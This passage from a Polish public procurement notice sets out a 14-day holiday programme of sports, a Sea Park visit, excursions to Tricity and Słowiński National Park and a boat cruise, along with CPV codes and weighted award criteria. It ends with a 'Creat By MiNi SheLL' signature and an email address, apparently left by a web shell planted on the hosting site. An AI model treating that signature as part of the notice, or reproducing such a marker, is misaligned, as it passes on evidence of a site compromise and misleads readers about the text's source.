e)	Zajęcia sportowe  gry zespołowe, zajęcia lekkoatletyczne
f)	Sea Park (wizyta w fokarium  pokaz tresury  i karmienia fok, wizyta w prehistorycznym oceanarium), miniatury latarni morskich.

15	W ramach programu Wykonawca zobowiązany jest do zorganizowania wycieczek:
a) wycieczka autokarowa z pilotem do Trójmiasta-Gdyna-Sopot-Gdańsk
b) wycieczka do Słowiańskiego parku narodowego,
c) rejs statkiem po morzu

Bilety wstępu i przewodnicy do proponowanych miejsc i obiektów mają być w cenie oferty.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>63500000-4, 55240000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Wycieczka do Centrum Nauki Eksperyment w Gdyni </td><td>20</td></tr><tr><td>Wycieczka do Ustki - Bunkry Baterii Bluchera </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com